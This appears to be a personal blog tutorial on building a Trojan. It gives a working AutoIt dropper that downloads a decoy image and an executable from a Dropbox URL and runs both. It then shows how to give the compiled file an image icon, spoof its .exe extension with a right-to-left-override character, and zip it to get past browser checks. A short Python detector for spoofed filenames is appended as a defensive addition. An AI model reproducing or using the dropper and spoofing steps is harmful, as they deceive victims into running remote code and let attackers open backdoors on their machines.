A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect your computer or mobile device.
What is trojan malware?
Trojan malware, when opened, appears to be a legitimate file that the user chose to open, like an image, a document, or a media file, but in the background it runs a malicious process: for example, someone may gain access to your computer through a backdoor, or other harmful code may be injected.
Creating my trojan malware
In this blog, I will show you how I combined my executable file with an image file so that, when a target person opened it, the image was displayed while the executable ran in the background. In simple words, I hid my .exe file in a .jpg image file.
This method can be extended to any file type, such as an image, PDF, music file, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let's look at the steps:
1. Get a direct URL for the image and the .exe file
The .exe file needs to be hosted at a publicly reachable URL from which the browser can download it directly. I have uploaded the executable to Dropbox for this purpose. In the case of Dropbox, changing the end of the shareable link to dl=1 makes the browser download the file directly. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.
URL for the .exe executable: https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1
Image of a sports complex
I have used the image of the sports complex as a cover.
2. Using the URLs in a script
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "url1,url2"
Local $urlsArray = StringSplit($urls, ",", 2)
For $url In $urlsArray
    $sFile = _DownloadFile($url)
    ShellExecute($sFile)
Next
Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc ;==>_DownloadFile
In the above code, on line 3, replace url1 with the URL of the image and url2 with the URL of the executable file. My final code looks like this:
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1"
Local $urlsArray = StringSplit($urls, ",", 2)
For $url In $urlsArray
    $sFile = _DownloadFile($url)
    ShellExecute($sFile)
Next
Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc ;==>_DownloadFile
Save the file with the extension .au3. I have named the file trojan.au3.
3. Creating an icon for the file
Since I am using an image as the cover file, and Windows usually shows a thumbnail of an image as its file icon, I will use the sports complex image as the icon and convert it to .ico format. A web search will turn up a number of tools for this. I used this website: https://cloudconvert.com/jpg-to-ico
4. Compiling the script
The script is written in a scripting language called AutoIt. To install AutoIt on Ubuntu, you can install Wine and then install AutoIt under it, or, if you want a more straightforward way, install Veil following the steps at https://www.javatpoint.com/installing-veil. AutoIt is installed in one of those steps, after which you can exit the installation.
Open the Compile AutoIt app. The window should look something like the box shown below. Enter the location of the trojan.au3 file and the path of the .ico file.
The compiled file looks like this on a Windows machine.
Well, something's not right. The problem with this file is its extension. It is obvious that it is an executable, since its extension is .exe. We need to spoof this extension.
5. Spoofing the .exe extension to any extension
To hide the obvious .exe extension and make it appear as .jpg, we will use a right-to-left-override character.
To know about the detail of how spoofing actually works and where to place the right-to-left-override character, read the blog.
To summarise the steps mentioned in the above blog:
Rename trojan.exe to trojangpj.exe.
Paste the right-to-left-override character at the 7th position, i.e. directly after trojan. All the characters after the right-to-left-override character are displayed flipped, i.e. read from right to left.
The filename now appears as trojanexe.jpg.
Since the image contained in the file is of a sports complex, I will replace trojan in the name with sports_compl so that the file name appears as sports_complexe.jpg.
Congrats!!! The trojan is ready.
Now the filename matches the image it contains. Some recent browsers strip the right-to-left-override character before downloading, so it is a good idea to zip the file and send it that way.
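As an added defender-side example (not part of the original post), the following Python checks filenames, including the member names of a zip archive like the one described above, for Unicode bidi-override characters and reports the real extension against the one a user would see. The archive and its member names are constructed here for illustration; the spoofed name is the sports_compl + U+202E + gpj.exe pattern from this post.

```python
import io
import unicodedata
import zipfile

# Unicode bidi controls that can make a filename render differently from how
# the OS parses it; U+202E (RIGHT-TO-LEFT OVERRIDE) is the one used above.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def analyse_filename(name: str) -> dict:
    """Describe how a filename is parsed versus how it is likely displayed."""
    controls = [c for c in name if c in BIDI_CONTROLS]
    # The real extension is whatever follows the last dot in the raw string.
    real_ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    # Approximate rendering: text after an RLO is drawn reversed (exact for
    # the ASCII letters, digits and dots used in the example above).
    head, rlo, tail = name.partition("\u202e")
    shown = head + (tail[::-1] if rlo else tail)
    shown = "".join(c for c in shown if c not in BIDI_CONTROLS)
    shown_ext = shown.rsplit(".", 1)[1].lower() if "." in shown else ""
    return {
        "controls": [unicodedata.name(c) for c in controls],
        "real_extension": real_ext,
        "displayed_as": shown,
        "displayed_extension": shown_ext,
        # Flag only when a control character changes the apparent extension.
        "suspicious": bool(controls) and real_ext != shown_ext,
    }


def scan_zip(data: bytes) -> list:
    """Return the member names of a zip (given as bytes) that look spoofed."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [n for n in zf.namelist() if analyse_filename(n)["suspicious"]]


def build_sample_zip() -> bytes:
    """Constructed sample archive: a plain image name and a spoofed .exe name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("park_garden_concourse.jpg", b"placeholder, not an image")
        zf.writestr("sports_compl\u202egpj.exe", b"placeholder, not an exe")
    return buf.getvalue()


if __name__ == "__main__":
    for member in scan_zip(build_sample_zip()):
        info = analyse_filename(member)
        print(f"{info['displayed_as']!r} is really a .{info['real_extension']}")
```

The same check can be applied to mail attachment names or download directories; the "displayed_as" field is what a user sees in Explorer, while "real_extension" is what Windows will actually execute.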
This blog was originally published on Gourav's personal blog: https://gourav-dhar.com